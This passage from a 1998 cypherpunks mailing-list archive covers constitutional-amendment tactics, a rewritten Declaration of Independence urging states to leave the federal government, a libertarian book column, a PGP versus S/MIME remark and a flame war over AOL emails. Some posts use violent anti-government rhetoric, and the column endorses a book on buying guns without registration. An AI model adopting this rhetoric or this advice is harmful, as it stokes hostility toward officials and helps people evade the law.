proposal submitted by the states would force the debate of how it was to be
decided. Once that was settled it would be passed back to the appropriate
state legislature for direct vote or the initiation of a convention if
sufficient votes could be found.

> There's only a time limit because Congress has started specifying one, in the
> same resolution which proposes the amendment and specifies the ratification
> method.  (Exception: in the case of the ERA, I believe they later extended the
> limit).  The power to specify a time limit isn't mentioned in the Constitution 
> as you note, but has also never been tested.

I assume your speaking of the prohibition amendments again and their limits
(7 years I seem to remember).

That raises an interesting point. Suppose that the states submit an
amendment proposal, can Congress modify it? I'd say not because of the 10th.
If they could then the power of the states to submit amendments would be
moot.



    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Thu, 26 Nov 1998 03:52:22 +0800
To: cypherpunks@cyberpass.net
Subject: [ISN] Feds Want Banks to Spy on All Customers...Even You!   (fwd)
Message-ID: <3.0.3.32.19981125194905.0088b530@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/enriched

 >Date: Wed, 25 Nov 1998 08:26:54 -0500 (EST)
>From: Ken Williams <jkwilli2@unity.ncsu.edu>

>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>
>Good thing I keep all my money in a steel case buried somewhere
>along the Appalachian trail.  No bank accounts, no credit cards.
>
>Ken Williams
>
>>From: ISPI Clips 6.51
>>From: WorldNetDaily, November 23, 1998
>
>Big Brother Banks? FDIC has snooping plans
>http://www.worldnetdaily.com/bluesky_exnews/19981123_xex_big_brother_.shtml
>David M. Bresnahan, David@talkusa.com
>Contributing Editor, WorldNetDaily
>
>Are you a potential criminal? Are you a threat to banks, airlines, a
>potential spy, or perhaps an IRS tax protester? The government would like
>to know and they are about to force banks to be their detectives. 
>

Isn't this called prior restraint? Isn't it specifically illegal for the government to treat all members of the public as criminals a priori?

This certainly sounds like one of the grossest cases of Feds-That-Should-Die(TM) that I have ever heard. I'm sure that the founding fathers would have been stocking up on gun powder and lead over this one. And I'm NOT one of the many Libertarian/Money-Gun-and-Gold-Stashing types on this list. I far and away prefer to work inside the system peacefully. But, it does give me pause to think about it!

When a supposedly NON-LEA agency such as the FuckingDICks begins creating regulations of this sort it is the most blatant proof that the constitution has died. Perhaps it is time to start draft the next version of the Declaration of In dependance... Actually, we wouldn't need to change much. It was an excellent document then and now and perhaps it is time shake the dust off of it!

Here's my take on a new version, (read carefully the changes in some cases are subtle):

THE DECLARATION of INDEPENDENCE

------------------------------------------------------------------------

Action of the New Continental Consensus, July 4, 1999
The Declaration of the People of the United States of America 
------------------------------------------------------------------------
WHEN in the Course of human Events, it becomes necessary for one People to dissolve the Political Bands which have connected them with another, and to assume among the Powers of the Earth, the separate and equal Station to which the Laws of Nature and of Nature's God entitle them, a decent Respect to the Opinions of Mankind requires that they should declare the causes which impel them to the Separation. 

WE hold these Truths to be self-evident, that all Men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty, Privacy and the Pursuit of Happiness -- That to secure these Rights, Governments are instituted among Men, deriving their just Powers from the Consent of the Governed, that whenever any Form of Government becomes destructive of these Ends, it is the Right of the People to alter or to abolish it, and to institute new Government, laying its Foundation on such Principles, and organizing its Powers in such Form, as to them shall seem most likely to effect their Safety and Happiness. Prudence, indeed, will dictate that Governments long established should not be changed for light and transient Causes; and accordingly all Experience hath shown, that Mankind are more disposed to suffer, while Evils are sufferable, than to right themselves by abolishing the Forms to which they are accustomed. But when a long Train of Abuses and Usurpations, pursuing invariably the same Object, evinces a Design to reduce them under absolute Despotism, it is their Right, it is their Duty, to throw off such Government, and to provide new Guards for their future Security. Such has been the patient Sufferance of these people; and such is now the Necessity which constrains them to alter their former Systems of Government. The History of the present Federal Government of the United States of America is a History of repeated Injuries and Usurpations, all having in direct Object the Establishment of an absolute Tyranny over these States. To prove this, let Facts be submitted to a candid World. 

It has refused its Assent to Laws, the most wholesome and necessary for the public Good. (Agencies such as the NSA and CIA whose actions are wholly unsupervised and unchecked.)

It has forbidden its Governors to pass Laws of immediate and pressing Importance, unless suspended in their Operation till its Assent and modification should be obtained; and when so suspended, it has utterly neglected to attend to them. (Basterdazation of state and local voters measures threw inappropriate judiciary interference.)

It has refused to pass other Laws for the Accommodation of large Districts of People, unless those People would relinquish the Right of Representation in the Legislature, a Right inestimable to them, and formidable to Tyrants only. (Pick any agency... none allow for direct representation in their regulatory actions. Public comment IS NOT direct representation!)

It has called together Legislative Bodies at Places unusual, uncomfortable, and distant from the Depository of their public Records, for the sole Purpose of fatiguing them into Compliance with its Measures. 

It has investigated, harassed, terrorized, and killed members of Representative Bodies repeatedly, for opposing with its manly Firmness its Invasions on the Rights of the People. 

It has refused for a long Time, after such Dissolutions, to allow others to act; whereby the Legislative Powers, incapable of the Annihilation, have not been returned to the People at large for their exercise; the State remaining in the mean time exposing them to all the Dangers of Invasion from it, and the Convulsions within. 

It has endeavored to prevent the Population of these States; for that Purpose obstructing the Laws for Naturalization of Foreigners; refusing to pass others to encourage their Migrations hither, and raising the Conditions of new ownership of Lands and Properties. 

It has obstructed the Administration of Justice, by refusing its Assent to Laws for respecting Judiciary Powers. (You can't sue them unless they say it's OK... And when you do who do you sue?)

It has made Judges dependent on its Will alone, for the Tenure of their Offices, and the Amount and Payment of their Salaries. 

It has erected a Multitude of new Offices, and sent hither Swarms of Officers to harass our People, and eat out their Substance. 

It has kept among us, in Times of Peace, Standing Armies, without the consent or oversight of our Legislatures. (NSA, CIA, IRS, ATF, etc.)

It has affected to render the Military and National Security Forces independent of and superior to the Civil Power. 

It has combined with others to subject us to a Jurisdiction foreign to our Constitution, and unacknowledged by our Laws; giving its Assent to their Acts of pretended Legislation: 

FOR quartering large Bodies of Armed Troops among us; 

FOR protecting them, by a mock Trial, from Punishment for any Murders which they should commit on the Inhabitants of these States: 

FOR cutting off our Trade with all Parts of the World: (ITAR, etc.)

FOR imposing Taxes on us without our Consent: 

FOR depriving us, in many Cases, of the Benefits of Trial by Jury: (Try to fight an "infraction" in California!)

FOR transporting us beyond Seas to be tried for pretended Offences: (Hi CJ!)

FOR abolishing the free System of English Laws in a neighboring Province, establishing therein an arbitrary Government, and enlarging its Boundaries, so as to render it at once an Example and fit Instrument for introducing the same absolute Rules into these Colonies: (Ever been to a US territory?) 

FOR taking away our Charters, abolishing our most valuable Laws, and altering fundamentally the Forms of our Governments: (Let's hear it for the IRS and NSA, and now FDIC!)

FOR suspending our own Legislatures, and declaring themselves invested with Power to legislate for us in all Cases whatsoever. (Who actually makes tax regulation?!)

It has abducted Government here, and declared us under of its Protection and thus waging War against us. 

It has plundered our Seas, ravaged our Coasts, burnt our Towns, and destroyed the Lives of our People. 

It is, at this Time, transporting large Armies of Mercenaries to compleat the Works of Death, Desolation, and Tyranny, already begun with circumstances of Cruelty and Perfidy, scarcely paralleled in the most barbarous Ages, and totally unworthy of a civilized Nation. 

It has constrained our fellow Citizens taken Captive to bear Arms and false testimony against their Countrymen, to become the Executioners of their Friends and Brethren, or to fall themselves by their Hands. 

It has excited domestic Insurrections amongst us, and has endeavored to bring on the Inhabitants of our Frontiers, the merciless Profiteering Drug Peddlers, whose known Rule of Warfare, is an undistinguished Destruction, of all Ages, Sexes and Conditions. (Don't forget Noriega and his CIA buddies. You wouldn't get even money on the bet that they have changed their ways...)

It has subverted the very essence of the Constitution and Bill of Rights which gave it birth by perpetrating the following acts of barbarism and contempt for the people:

Confiscation of Personal Properties being routinely executed without the most minimum attempt at DUE PROCESS;

Routine and massive warrant-less searches and seizures of the personal communications of the people;

Commonplace denial of competent legal defense and availability of juries of one's peers;

Unconstitutional restrictions of the movement of the people and their assets;

Unconstitutional restrictions of the peoples' right to assemble, publicly and privately and secretly;

IN every stage of these Oppressions we have Petitioned for Redress in the most humble Terms: Our repeated Petitions have been answered only by repeated Injury and imprisonment in State Mental Institutions. A Prince, whose Character is thus marked by every act which may define a Tyrant, is unfit to be the Ruler of a free People. 

NOR have we been wanting in Attentions of our International Brethren. They have warned us from Time to Time of Attempts by our Legislature to extend an unwarrantable Jurisdiction over them. They have reminded us of the Circumstances of our Emigration and Settlement here. They have appealed to our native Justice and Magnanimity, and they have conjured us by the Ties of our common Kindred to disavow these Usurpations, which, would inevitably interrupt our Connections and Correspondence. They too have been denied the Voice of Justice and of Consanguinity. We must, therefore, acquiesce in the Necessity, which denounces our Union in the Spirit of Freedom, and hold them, as we hold the rest of Mankind, Enemies in War, in Peace, Friends. 

WE, therefore, the People of the UNITED STATES OF AMERICA, in GENERAL CONSENSUS, Assembled, appealing to the Supreme Judge of the World for the Rectitude of our Intentions, do, in the Name, and by Authority of the good People of these States, solemnly Publish and Declare, That these United States are, and of Right ought to be, FREE AND INDEPENDENT STATES; that they are absolved from all Allegiance to the Federal Government, and that all political Connection between them and the Federal Government of the USA, is and ought to be totally dissolved; and that as FREE AND INDEPENDENT STATES, they have full Power to levy War, conclude Peace, contract Alliances, establish Commerce, and to do all other Acts and Things which INDEPENDENT STATES may of right do. And for the support of this Declaration, with a firm Reliance on the Protection of divine Providence, we mutually pledge to each other our Lives, our Fortunes, and our sacred Honor. 

Signed,

The names of course will be changed to protect the innocent...

I may not be up to the task of editing TJ, but you get the point!

I was going to send this through an anonymizer and sign it Thomas In Payne. But Fuck the MIBs.  This is MY Opinion Freely Stated as I'm guaranteed by the Constitution they are so hell bent on destroying. This adaptation of such a revered document as our dear Declaration of Independence is meant to provoke thought and perhaps one last effort by many to halt the erosion of the effectiveness of what was perhaps the most important statement of what a government should be that the world has ever known. It is time that we take back our Constitution from the MIB.

My only question is HOW?

APF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 26 Nov 1998 08:06:01 +0800
To: cypherpunks@cyberpass.net
Subject: Nov. 29 column - Christmas book giving
Message-ID: <v04020a1ab282366dfaea@[62.136.30.77]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Wed, 25 Nov 1998 00:40:16 -0700
Date: Tue, 24 Nov 1998 23:38:45 -0800 (PST)
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Nov. 29 column - Christmas book giving
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/599
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com
Status: RO


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED NOV. 29, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    Give a dangerous book for Christmas


    Pickings have been a little slim, I must admit, for my annual Christmas
book column.

  At the risk of emulating the editors of Rolling Stone, with whom I parted
ways when they started dismissing all the best music of the '70s as
"derivative" (heck, what isn't, Parker and Coltrane are "derivative," and I
happened to (start ital)like(end ital) Eric Carmen and the Raspberries) --
I must admit a certain deja vu at reviewing the 1998 literary crop. These
volumes don't just remind me of better works which made the list in former
years, they often (start ital)cite(end ital) those books, at length.

  1) Well worth mentioning is a "how-to" paperback of about 180 pages, and
one of the few volumes I've read cover-to-cover of late, "Boston on Guns &
Courage," by the pseudonymous Boston T. Party, available from Javelin
Press, P.O. Box 31, Ignacio, Colo. 81137-0031. The book is $17, or $10.20
apiece for six to 31 copies, but the publishers quirkily request payment
only in cash (that gets you an autographed copy) or payee-blank
(negotiable) money orders , threatening to return checks of money orders
with a named payee.

  Mr. Party is of the opinion that the "thugs" who outlawed the private
possession of gold in 1933 "should have been strung up from the first day,"
and properly dismisses many modern gun owners as "serfs with guns,"
demanding "If you won't fight for your Liberty, then sell your guns to us
now before they're confiscated without compensation."

  He then spends the bulk of his book running through the options for
Americans who have finally decided to arm themselves against incipient
tyranny, running through the pros and cons of each caliber and type of
weapon; gun safety; current and likely future gun control laws; how to buy
guns without having them registered ... a handy little book, even if it's
sketchy in places.

  Of course, I disagree with many of the author's specific recommendations.
(In .308 battle rifles, if you can believe it, Mr. Party actually favors
the tin-and-plastic Belgian FN-FAL over the sturdy American M-14 and its
civilian version, the M-1A. Of taste there is certainly no accounting. And
it's a tad careless to recommend the Soviet Tokarev SVT 40 -- "very nicely
made" -- given the weapon's well-known propensity to shred its own firing
pins, isn't it?)

  But in this author we find a kindred spirit,  correctly reporting that
"The feds hope to 'decapitate' the Freedom Movement by simultaneously
arresting and/or eliminating several hundred key people," something they've
already demonstrated with their infiltration via agents provocateurs of the
burgeoning 1990s militia movement, albeit not quite "simultaneously."

  The author quotes Arthur B. Robinson explaining "The gun controllers are
not deterred by the facts about guns and crime, because their primary fear
is not of criminals. They fear ordinary Americans whose lives and freedom
their policies are destroying. In this fear and in their world, they are on
target."

  He gathers together great swatches from books which have already made
this "Most Dangerous" list in previous years (and which are still highly
recommended), including L. Neil Smith's "Pallas," Bill Branon's "Let Us
Prey," Jim Bovard's "Lost Rights" (Laissez-Faire Books at 800-326-0996),
Claire Wolfe's "101 Things To Do Till the Revolution" (Loompanics at
800-380-2230, or Laissez-Faire), and of course John Ross' masterful novel
of the put-upon gun culture, "Unintended Consequences" ($28.95 from
hard-to-find Accurate Press in St. Louis, so try Paladin Press at
800-392-2400, or else Loompanics), from which we again hear:

  "These government slugs ban our guns and they ban our magazines and they
ban our ammo. They ban suppressors that make our guns quieter and then they
ban outdoor shooting ranges because our guns are too loud. They ban
steel-core ammunition because it's 'armor-piercing,' then they close down
our indoor ranges where people shoot lead-core bullets because they say we
might get lead poisoning. ...

  "If we sell one gun that's gone up in value, they can charge us with
dealing firearms without a federal dealer's license, which is a felony. If
we get a dealer's license, they say we are not really in business, and
report us to our local authorities for violating zoning ordinances by
running a commercial venture out of a residence. ...

  "Then, if they suspect we've ignored the $200 tax process, on the guns
where the wood and steel is too long or too short, they'll spend over a
million dollars watching us for months, then they'll shoot our wives and
children or burn us all alive," for which no federal agent has ever spent a
single night in jail.

  And this, mind you, in a nation with a Constitution which guarantees the
federal government will never, in any way, "infringe" the right of the
people to keep and bear military-style arms.


    #   #   #

  2) With a lot less politics and a lot more pictures, my second selection
this year is also a gun book, Timothy Mullin's "Testing the War Weapons,"
in which the author actually carries around and test fires virtually every
surplus military long arm a modern American can lay hands on (and several
we cannot -- who's going to buy (start ital)me(end ital) a Flapper-era,
$3,500, fully-automatic Belgian FN-D?), from the widely-ridiculed Italian
Carcano ("the JFK rifle"), to the grossly overrated German Gewehr 3. Based
on his own quite sensible criteria, Mr. Mullin then fearlessly reports
which of these guns actually prove far handier in the field than one might
expect ... and which prove quite the opposite.

  It's a marvellous project well carried out, in which anyone interested in
old (or not-so-old) military firearms is likely to find a few pleasant
surprises - and probably something to argue with.

  One very big demerit to the editors at Paladin Press  (P.O. Box 1307,
Boulder, CO 80306) for the mediocre quality of the B&W photo reproductions
in "Testing the War Weapons," and for the horrendous proofreading. But this
is still a wonderful book, in 8X10 trade paperback at about $40.

  3) No, our friends and relatives are not going to be reading only about
guns this holiday season. Anyone interested in alternative medicine or the
"War on Drugs" should be happy to receive Steve Kubby's heartfelt and (in
the end) heartwarming book, "The Politics of Consciousness," from
Loompanics Unlimited, P.O  Box 1197, Port Townsend, Wash. 98368.

  Again, Mr. Kubby's work stands on the shoulders of such predecessors as
Jack Herer ("The Emperor Wears No Clothes", Hemp Publishing, Van Nuys,
Calif.), Terence McKenna ("The Archaic Revival," from Bantam Books, and
"Food of the Gods,"  from HarperCollins), and Schultes & Hofmann ("Plants
of the Gods," Healing Arts Press, Rochester, Vermont) which are widely
cited here, and highly recommended (by me) in their own right.

  Mr. Kubby (this year's Libertarian candidate for governor of California,
I believe) is one of those who has come to realize that the War on Drugs is
not merely puritanism given the backing of armed government in violation of
the First Amendment, but something much more insidious and evil yet:
nothing less than the denial of the mental and spiritual health which
mankind is meant to be allowed to achieve, through the direct religious
experiences of the entheogenic (hallucinogenic) plants.

  Chapter headings like "The War on Freedom," "Criminalizing Nature,"
"Western Civilization is the Disease," "Molecular Theology," and
"Downloading the Cosmic Design" give some idea of the delightful
subversiveness of this 150-page, 8X10 paperback, with its psychedelic
cover. But if you want to do some smug Drug Warrior's psyche more harm than
would likely be accomplished by 250 micrograms of orange sunshine, simply
get him or her to read the six-page chapter "Manna from Heaven."

  What (start ital)was(end ital) the bread that fell like rain from heaven
in Exodus Chapter 16, verse 4? What (start ital)was(end ital) the "small
round thing" that "lay as small as the hoar frost on the ground," which had
to be eaten immediately in the morning, lest it "breed worms and stink"?
What (start ital)was(end ital) the God-given substance which was so holy to
the Israelites that they later placed the last of it in a golden pot in the
Ark of the Covenant (Hebrews, Chapter 9, verse 3)?

  Order up a bunch of Mr. Kubby's liberating book, and spread them around.


    #   #   #

  4) Finally comes a book I firmly and fearlessly  recommend, while I also
feel obliged to place my readers' interests above any possible sensitivity
of the author, and thus to offer an unusual caveat:

  Just as some patrons of the visual arts have found delight in the very
refusal of such "primitives" as Grandma Moses to study the rules of
perspective and photographic realism, celebrating on its own terms the
resultant cross between "professional" painting and the decorative folk art
of the quilted bedspread, so must I note that the novel "TEOTWAWKI -- The
End of the World as We Know It," by James Wesley, Rawles (comma as
written), soon to be released in trade paperback from Huntington House
Publishing as "Patriots: Surviving the Coming Collapse," succeeds in a
similar dimension between professional fiction and the delightfully naive
tale-telling of children and the childlike.

  I got my copy - an 8X10 Internet download with a color-copied cover --
from Mike McNulty (author of the Academy Award-nominated video "Waco: The
Rules of Engagement" -- which should be on this list even if it's not a
book) and Bob Glass, publisher of the promising new magazine "The Partisan:
Journal of the American Freedom Fighter" ($20 per year from P.O. Box 1085,
Longmont, CO 80502) at this year's Soldier of Fortune Expo.

  Still hunting for the first good book to be based on the upcoming "Y2K"
crisis, I dug in ... and discovered that Mr. Rawles has indeed put together
a thoughtful, thought-provoking, and well-researched survival manual,
indicating in highly pragmatic terms how folks might well prepare for
social unrest or breakdown of our established economic, commercial and
political order in years to come -- prepare not just to squat on some piece
of dirt, mind you, but to actually maintain a civilized lifestyle.

  Then, Mr. Rawles opted to deck out this intriguing, useful research as a
work of fiction so bad -- by any traditional measure -- as to cross the
line on many occasions into unintentional knee-slapping hilarity.

  The good guys pray to Jesus before each militia foray, and resist
dividing up the gear even of their dead comrades, since that would be
"stealing." The bad guys are -- I think I've got this right -- homosexual
communists who actually carry around copies of Mao's Little Red Book, and
who get their nourishment by preserving the best body parts of the little
human babies they murder in their travels. Eventually, Idaho is invaded (of
course) by a gang of U.N. mercenaries out of Brussels, though of course
they and their tank columns are eventually defeated by the ingenuity and
just plain spunk of the outnumbered Patriot defenders.

  Subtlety? Ambiguity? Not here in God's country, pardner. This thing makes
the movie "Red Dawn" (which I also love) look restrained.

  And yet, in the midst of the nonsense, Mr. Rawles really can write a
quite moving, effective, and realistic scene, as when a lone patriot
rifleman in a well-chosen position sacrifices himself to inflict dozens of
casualties on an advancing enemy column, holding them up for most of a day.


  But I have given fair warning: Just as Mr. Churchill admitted democracy
was a terrible system -- except when compared to all the alternatives -- so
is TEOTWAWKI a jaw-droppingly lunkheaded piece of fiction ... behind which
is hidden a quite useful book, the first useful working sketch of a "Y2K"
scenario which I have yet discovered ... unless we count "Atlas Shrugged"
or "A Canticle for Liebowitz" or "A Boy and His Dog," of course. Which we
probably should.

  (Mr. Rawles also sells pre-1899 antique firearms, which can be purchased
via mail order without federal controls, via Clearwater Trading Co., P.O.
Box 642, Penn Valley, Calif. 95946 -- e-mail rawles@usa.net -- a fine
fellow, surely.)

  Order one of his remaining self-published copies through the same Penn
Valley address at about $28, or via Patriot Products, 6595 Odell Place,
Suite G, Boulder CO 80301, or ask your local bookstore to locate a copy of
the new Huntington House edition, "Patriots: Surviving the Coming Collapse"
(ISBN 1-56384-155-X) from their wholesalers, or via the Huntington House
toll free order line at 800-749-4009.

  And have a merry Christmas.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The web
sites for the Suprynowicz column are at
http://www.infomagic.com/liberty/vinyard.htm, and
http://www.nguworld.com/vindex. The column is syndicated in the United
States and Canada via Mountain Media Syndications, P.O. Box 4422, Las Vegas
Nev. 89127.

***


Vin Suprynowicz,   vin@lvrj.com

The evils of tyranny are rarely seen but by him who resists it. -- John
Hay, 1872

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Thu, 26 Nov 1998 06:28:22 +0800
To: Jim Choate <cypherpunks@Algebra.COM>
Subject: Re: How to reign the federal government in...
In-Reply-To: <199811252030.OAA30458@einstein.ssz.com>
Message-ID: <365C8A52.CF56EC1C@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Start a political party, but the likes of which has never walked the face of
> the Earth.

Ok, what kind?

 
> The individual states when acting in a clear majority (>=75%) may pass
> Constitutional amendments without the involvement or interference of federal
> processes.

Ok, lets look at Article V. of the US Constitution.

Article. V.

The Congress, whenever two thirds of both Houses shall deem it
necessary,
shall propose Amendments to this Constitution, or, on the Application of
the Legislatures of two thirds of the several States, shall call a
Convention for proposing Amendments, which, in either Case, shall be
valid
to all Intents and Purposes, as Part of this Constitution, when ratified
by the Legislatures of three fourths of the several States, or by
Conventions
in three fourths thereof, as the one or the other Mode of Ratification
may
be proposed by the Congress; Provided that no Amendment which may be
made
prior to the Year One thousand eight hundred and eight shall in any
Manner
affect the first and fourth Clauses in the Ninth Section of the first
Article;
and that no State, without its Consent, shall be deprived of its equal
Suffrage in the Senate [Possibly abrogated by Amendment XVII].


As per Article V, two thirds of the States can call a Convention to
propose
Amendments.  I believe this would be 33 of our current 50 states. 
Territories
and other holding would have no say in this.  At this point, if three
fourths of
the states agree to any proposed Amendments, it becomes the law of the
land.

We only need two thirds of the States to start the process, but this
must be
done by their Legislatures.


> The IRS, for example, could be shut down tomorrow or significantly modified
> via this mechanism without involvement at the federal level.

I assume this would be either by nullifying Amendment 15 or modifying it
to a great degree.  Nothing else would work.


> What is needed is a political party that has a representative site in each
> state capital. Their job is to get proposed amendments to the Constitution
> on the floor of each body for vote.

Actually, it would not be to get the proposed amendments on the floor. 
You
would be putting the proposal for a Convention to amend the Constitution
on
the floor.  In addition, depending on the State, the party would likely
need
to have a member elected to that States Legislature.

Another possibility, again depending on the State is to have a State
Constitutional amendment directing that States Legislature to vote for a 
Convention by a specific date.


> Think nationaly, act by state.
> 
> There could be no appeal to the Supreme Court for constitutionality because
> it IS the Constitution.
> 
> There are no requirements in the Constitution to notify or otherwise
> register such acts with the federal authorities. In short, it's none of
> their business if the people acting at the state level change the laws at
> the federal level. They must either comply or quit their jobs.

That is why Article V was written as it was.  It provides a backdoor to
keep
the federal government from getting out of control.

-Doug
www.TheServerFarm.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <s1180@qmail.pjwstk.waw.pl>
Date: Thu, 26 Nov 1998 07:44:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: open-pgp / s/mime interoperability
In-Reply-To: <199811242259.WAA04469@server.eternity.org>
Message-ID: <365C8E1D.2A56D16D@qmail.pjwstk.waw.pl>
MIME-Version: 1.0
Content-Type: text/plain



Abstract: "Should I buy PGP or S/MIME?" 
<This little thing is a recap on what I think these posts are bout.>

Well, I just want to remind something, something that someone else has
mentioned not so long ago, and it's this: PGP is Open Source, while
S/MIME is not.
This means PGP and it's algorithms have been scrutinized over, while
S/MIME has not... Although this might not be enough to decide weather
to use PGP or S/MIME, I would give a '+' to PGP for making an effort
to be accountable, and a '-' for S/MIME for being secretive.
 
Sincerely,
Jan Dobrucki

<the article is cut...>

DSA is a signature-only algorithm. Consequently, you aren't doing a
"decryption" with it when you evaluate a signature. I recommend you
look in
a crypto source book, like Schneier's "Applied Cryptography" or
Menezes,
van Oorschot, and Vanstone's "Handbook of Applied Cryptography" for
details
of how DSS is done. There is also source code available from a wide
variety
of places.

<the article is cut...>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <PaulMerrill@acm.org>
Date: Thu, 26 Nov 1998 13:58:05 +0800
To: Cypherpunks@Algebra.COM
Subject: Re: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohelsux)
Message-ID: <000a01be18fe$981008a0$1544ae98@default>
MIME-Version: 1.0
Content-Type: text/plain



>>Again, some clueless asshole that can't tell the difference between
>>solicited responses and Unsolicited spam mouths off.  If you would like
>>to talk about someone, talk about the jerk who set up an AIM name using
>>the outdated address, not the company that repsonded.
>>
>>PHM
>>
>>AKA PHMerrill@AOL.Com (among other names and addresses)
>
>Again, the clueless asshole known as Paul *H.* Merrill jumps up and defends
>AOL, incompetently-written web sites, and morons everywhere.
>
I obviously don't defend morons everywhere -- I didn't defend Mr Anonymous.

>Someone told AOL to mail cypherpunks@toad.com. AOL could have checked to
see
>if the originating site was under the toad.com domain. This is trivial.
They
>didn't. It's rather easy to just require that somebody trying to mail an
>address under the toad.com domain submit the request from an address under
>toad.com.
>
I regularly send from one domain while requesting a "something" to be dealt
with through another domain.  (A little something called work, for instance.
Shoot, even the ACM.Org address doen't pass that check but it certainly is
valid and unambiguously mine.

>In other words, Paul, you believe that if somebody goes and types your
>address into some system and asks it to send you 512MB of MPEG video,
that's
>okay because it was solicited. It wasn't solicited by you but somebody
>solicited it.
>
My point exactly -- so when you want to ream someone for the half gig MPEG,
ream the requester.

>Oops. That's "blatent propoganda." I'd better rephrase. In other words,
>Paul, you believe that if somebody goes and types YOUR address into fifty
>different systems, signs you up for a bunch of mailing lists, and generally
>causes you a lot of inconvenience, that's okay because it was solicited.
You
>don't know who it was solicited by, but somebody obviously did. If you then
>object to the sites sending you mail rather than just silently
>unsubscribing yourself every week, are you then just 'some clueless
asshole'?
>
The totality is not Okay.  But the individual systems that were solicited to
send are not at fault, assuming that they give me an out.  OTOH the asshole
that requested it all is quite another topic. That "spammer" is the one that
should be taken to task.

>Are spammers now not to be held accountable for their spamming because they
>bought a list of addresses from someone who claimed that the people all
>asked to be on the mailing list?
>
there is a significant difference between buying a list and answering a
request.  Granted that the net effect of having a confirmation message sent
to some one person shows little difference, but the methodology and intent
are nt the same at all.

>Why don't we just sign Cypherpunks up for Ignition-Point, the FP list, the
>ACLU action advisories, Sixdegrees, and whatever else we can find? Or
should
>We just sign up Paul, really, because he doesn't have a problem with this.
>In fact I'm sure we could make some 'marketting research' to show that he
>might be interested. Hey let's get the entire CDR subscription list and
>sign everybody up for FP and ACLU because if you're on Cypherpunks you're
>obviously interested in those things.

The analogous activities have been going on for many years and they have
never been a Good Thing.
>
>The root of the problem is sites which require email addresses for no good
>reason, and/or don't have the decency to perform a simple check to see if
>the domains match. They're lazy. They're irresponsible. When confronted, no
>matter how civil, they react much like you do, Paul, and they don't want to
>be inconvenienced by having to fix their usually badly-designed web sites.
>
Anyone that believes that a domain check will do anything other than check a
domain is delusional.  Hey, they even think like the post awful -- one
person, one email address.

>If I recall correctly Tim has the same opinion and has stated it a few
>times as have others so I'm not alone.
>
>Now I leave you, Paul, so you can go back to your 24 hour vigil and you and
>your quick response team can scour the net for attacks against AOL and the
>true clueless assholes, and defend them with your last breath.
>
Why, thank you.  But it is not really needed.
>Yet Another 'Clueless Asshole'
>
I never cease to be amazed at how little grasp of the concept of causality
so many presumably technically literate people are today.

When one wishes to remove a problem, it is a much better approach to attack
the cause than to attack the symptom.

PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <PaulMerrill@acm.org>
Date: Thu, 26 Nov 1998 14:09:23 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Re: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I aohels
Message-ID: <005d01be1901$01b2a860$1544ae98@default>
MIME-Version: 1.0
Content-Type: text/plain




-----Original Message-----
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
To: paul h. merrill <paulmerrill@acm.org>; cypherpunks@einstein.ssz.com
<cypherpunks@einstein.ssz.com>
Date: Wednesday, November 25, 1998 12:20 AM
Subject: Re: Re: Netscape AOL Instant Messenger Confirmation (kB3bEjeb1I
aohels


>Do you even bother to read the posts you try to flame? Read the last part
of
>that.
>
Yes, I do.  I do not buy the domain check idea due to the unworkability in a
changing and multi-faceted society.  I do not buy the concept the anyone
that sends a piece that you don't want is a "spammer" (there really are
enough of them out there already without diluting the Title through
misnomers.) I do not buy attacking symptoms and ignoring causes -- and in
this case Causers.

PHM

>Paul H. Merrill wrote:
>>
>>Again, some clueless asshole that can't tell the difference between
>>solicited responses and Unsolicited spam mouths off.  If you would like
>>to talk about someone, talk about the jerk who set up an AIM name using
>>the outdated address, not the company that repsonded.
>>
>>PHM
>>
>>AKA PHMerrill@AOL.Com (among other names and addresses)
>>
>>Anonymous wrote:
>>>
>>> This does wonders for my opinion of AOL. Even the administration has no
clue.
>>>
